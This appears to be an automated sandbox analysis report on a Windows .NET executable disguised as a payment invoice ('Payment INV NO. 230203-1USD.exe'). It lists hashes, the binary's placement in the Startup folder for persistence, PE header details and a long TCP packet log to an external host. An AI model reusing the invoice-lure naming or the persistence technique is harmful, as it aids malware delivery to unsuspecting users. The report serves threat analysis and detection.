                                                        SHA1:75E6B58B7C75378ACBE604CB29E4A779952757D7
                                                        SHA-256:6351CE9E7C69556CDDC78CA84E2638490C98F507D0AC3816E81BEAD777DA7EDF
                                                        SHA-512:B016B18738F8006CAE9BBA528B1FB117580786334C3AEE0D6EB3ABABABBAE4C67528E5B2D357BA00297772601C462C0F46C723FC1C39B1A6B622637056BA8607
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0.................. ........@.. ....................................@.................................0...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................d.......H.......<c...A......B...@..................................................}......}......}.....(.......(.....*...0..+.........,..{.......+....,...{....o........(.....*..0...........s.....s.....s......s....}.....s....}.....s....}.....{....o......(......r...po......{....o.....o......r...po......{....o.....o .....{........s!...o".....{....r'..po#.....r...po$.....r...po%.....r5..po......{....o&....o'.....{.... 4... ,...s(...o).....{.....o*.....{....r'..po+.....{.....o,.....{....

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.274094209839526
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:Payment INV NO. 230203-1USD.exe
                                                        File size:37376
                                                        MD5:d6460e1a62bfb5366fff5959b99bbede
                                                        SHA1:75e6b58b7c75378acbe604cb29e4a779952757d7
                                                        SHA256:6351ce9e7c69556cddc78ca84e2638490c98f507d0ac3816e81bead777da7edf
                                                        SHA512:b016b18738f8006cae9bba528b1fb117580786334c3aee0d6eb3abababbae4c67528e5b2d357ba00297772601c462c0f46c723fc1c39b1a6b622637056ba8607
                                                        SSDEEP:768:h7XXrCDgJRjD8LfDYfNpPLGnpc1gK2O7o8S6PnBBiScJ:9nAsjDkfDYfNpipc1gdO7o8QScJ
                                                        TLSH:51F2B46472ACAF77D97D87FA5431021083F1A05B2925EA0C9EC3B4DB6B7AF440191F63
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0.................. ........@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x40a682
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x63F3AFB6 [Mon Feb 20 17:36:54 2023 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa6300x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x59c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xa4f80x1c.text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x86880x8800False0.38396139705882354data5.373742289592074IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xc0000x59c0x600False0.4244791666666667data4.098097439249916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xe0000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_VERSION0xc0900x30cdata
                                                        RT_MANIFEST0xc3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 22, 2023 08:36:17.818207026 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:17.818306923 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:17.818444967 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:17.923130989 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:17.923197031 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:17.984781027 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:17.984997988 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:17.988734961 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:17.988786936 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:17.989173889 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.041456938 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.284212112 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.284298897 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.443908930 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444170952 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444297075 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444309950 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.444334984 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444382906 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.444407940 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444586992 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444632053 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444660902 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.444681883 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444736958 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444745064 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.444758892 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.444825888 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.444839001 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.445087910 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.445151091 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.445188046 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.445203066 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.445219040 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.445255041 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.445931911 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.446007013 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.446012974 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.446029902 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.446094036 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.446111917 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.446814060 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.446876049 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.446933985 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.446935892 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.446957111 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.446975946 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.447504044 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.447566032 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.447597980 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.447617054 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.447700024 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.447714090 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.448364019 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.448452950 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.448474884 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.460732937 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.460805893 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.460863113 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.460910082 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.460915089 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.460943937 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.460958958 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.460992098 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.461435080 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.461538076 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.461591005 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.461746931 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.461762905 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.461822987 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.462179899 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.462373972 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.462418079 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.462467909 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.462482929 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.462531090 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.463229895 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.463354111 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.463972092 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.464134932 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.464154959 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.464916945 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.465025902 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.465038061 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.465086937 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.465631962 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.465730906 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.466386080 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.466491938 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.467374086 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.467720985 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.468405008 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.468477011 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.468523979 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.468540907 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.468553066 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.469011068 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.469074965 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.469104052 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.469121933 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.469141960 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.477777958 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.477866888 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.478018045 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.478040934 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.478795052 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.478876114 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.479002953 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.479024887 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.479511023 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.479621887 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.479640007 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.479707003 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.480303049 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.480381966 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.480429888 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.480443954 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.480479002 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.480524063 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.481141090 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.481239080 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.481950045 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.482069016 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.482084036 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.482100964 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.482144117 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.482815027 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.482923985 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.482939005 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.483002901 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.483625889 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.483700037 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.483760118 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.483772039 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.483787060 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.483813047 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.484529972 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.484673023 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.485443115 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.485537052 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.485559940 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.485579014 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.485598087 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.486268997 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.486347914 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.486510038 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.486541986 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.487085104 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.487214088 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.487231970 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.487297058 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.487900019 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.487963915 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.488018990 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.488034964 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.488069057 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.488095045 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.488934040 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.489053011 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.489464998 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.489533901 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.489567995 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.489586115 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.489598036 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.490436077 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.490514994 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.490566015 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.490583897 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.490634918 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.491348028 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.491455078 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.491475105 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.491653919 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.491729975 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.491745949 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.491760969 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.491796970 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.491821051 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.493556023 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.493680954 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.493724108 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.493746996 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.493763924 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.495379925 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.495418072 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.495527029 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.495551109 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.495582104 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.497201920 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.497236013 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.497350931 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.497370005 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.497392893 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.498384953 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.498418093 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.498506069 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.498521090 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.498554945 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.499473095 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.499505043 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.499649048 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.499674082 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.501189947 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.501224995 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.501383066 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.501401901 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.502208948 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.502242088 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.502357960 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.502374887 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.503746033 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.503777027 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.503921032 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.503942966 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.504664898 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.504695892 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.504828930 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.504846096 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.507164001 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.507236004 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.507400990 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.507420063 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.507447004 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.507481098 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.507545948 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.507558107 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.507596016 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.508630037 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.508663893 CET44349704162.159.135.233192.168.2.5
